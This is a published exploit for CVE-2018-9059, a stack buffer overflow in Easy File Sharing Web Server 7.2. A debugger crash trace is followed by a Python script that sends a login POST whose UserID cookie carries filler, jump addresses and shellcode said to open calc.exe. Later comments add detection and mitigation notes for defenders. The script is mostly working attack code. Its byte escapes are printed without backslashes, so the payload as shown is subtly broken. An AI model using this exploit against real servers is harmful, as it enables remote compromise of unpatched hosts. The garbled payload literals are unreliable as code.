# Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
# Date: 03/24/2018
# Exploit Author: rebeyond - http://www.rebeyond.net
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# CVE: CVE-2018-9059
# Tested on: Windows XP Professional SP3
#
# Description:
# An attacker only needs to construct a malicious login request packet and send it to the server; the server can then be compromised.
#
#
# The stack trace is as follows:
# (40d8.2980): Access violation - code c0000005 (first chance)
# r
# eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0
# eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -
# sqlite3!sqlite3_errcode+0x8e:
# 61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????
#
# kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e
# *** WARNING: Unable to verify checksum for fsws.exe
# *** ERROR: Module load completed but symbols could not be loaded for fsws.exe
# 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282
# 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4
# 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3


import requests
# Proof-of-concept request builder for CVE-2018-9059 (see header above).
# The whole script does one thing: it POSTs the login form of /forum.ghp with
# an oversized UserID cookie (4071 bytes of filler followed by the author's
# payload).  Per the stack trace in the header, the resulting crash is an
# access violation inside sqlite3!sqlite3_errcode with eax overwritten by the
# 0x41 filler.
#
# Defensive notes (what a detection or mitigation engineer should take away):
#   - The observable signature is a single HTTP POST to /forum.ghp carrying a
#     Cookie header of roughly 4.5 KB whose UserID value is mostly 'A's plus
#     non-printable bytes; a WAF/IDS rule on cookie length, or on non-printable
#     bytes in a cookie value, catches this request before the server parses it.
#   - A successful hit shows up as an fsws.exe crash (first-chance c0000005) or,
#     if the payload runs, a child process spawned by fsws.exe; both are worth
#     alerting on for hosts that still run this product.
#   - No vendor fix is referenced on this page; the practical mitigation is to
#     stop exposing the service to untrusted networks or remove it.

# Target host and port, hard-coded; the port is kept as a string because it is
# only ever concatenated into the URL below.
host='192.168.50.30'
port='80'

# Cookie value, built in the order it must appear on the stack.  The layout
# (filler, control-flow addresses, short jumps, payload) is the author's; the
# offsets are not re-derived here.  NOTE(review): the escape sequences in these
# literals are reproduced exactly as the page shows them.
buf='A'*4071
buf +='x12x45xfax7f' #jmp esp
buf +='A'*12
buf +='xebx36' #jmp 0x36
buf +='A'*42
buf +='x60x30xc7x61'*2 #must be valid address
buf +='A'*4
#shellcode to execute calc.exe on remote server (author's description; the
#bytes are opaque here and are not decoded anywhere on this page)
buf += "xdbxdcxd9x74x24xf4x58xbbx24xa7x26xecx33"
buf += "xc9xb1x31x31x58x18x03x58x18x83xe8xd8x45"
buf += "xd3x10xc8x08x1cxe9x08x6dx94x0cx39xadxc2"
buf += "x45x69x1dx80x08x85xd6xc4xb8x1ex9axc0xcf"
buf += "x97x11x37xe1x28x09x0bx60xaax50x58x42x93"
buf += "x9axadx83xd4xc7x5cxd1x8dx8cxf3xc6xbaxd9"
buf += "xcfx6dxf0xccx57x91x40xeex76x04xdbxa9x58"
buf += "xa6x08xc2xd0xb0x4dxefxabx4bxa5x9bx2dx9a"
buf += "xf4x64x81xe3x39x97xdbx24xfdx48xaex5cxfe"
buf += "xf5xa9x9ax7dx22x3fx39x25xa1xe7xe5xd4x66"
buf += "x71x6dxdaxc3xf5x29xfexd2xdax41xfax5fxdd"
buf += "x85x8bx24xfax01xd0xffx63x13xbcxaex9cx43"
buf += "x1fx0ex39x0fx8dx5bx30x52xdbx9axc6xe8xa9"
buf += "x9dxd8xf2x9dxf5xe9x79x72x81xf5xabx37x7d"
buf += "xbcxf6x11x16x19x63x20x7bx9ax59x66x82x19"
buf += "x68x16x71x01x19x13x3dx85xf1x69x2ex60xf6"
buf += "xdex4fxa1x95x81xc3x29x74x24x64xcbx88"

# The overflow lives entirely in the UserID cookie; SESSIONID and PassWD are
# just the other cookies the login page expects.  The form body fields are all
# empty -- they only make the request look like a normal login submission.
cookies = dict(SESSIONID='6771', UserID=buf,PassWD='')
data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
# Fire-and-forget: the response is not read because a server crash, not an
# HTTP reply, is the expected outcome.  NOTE(review): no timeout is passed, so
# this call blocks indefinitely if the server hangs instead of crashing.
requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)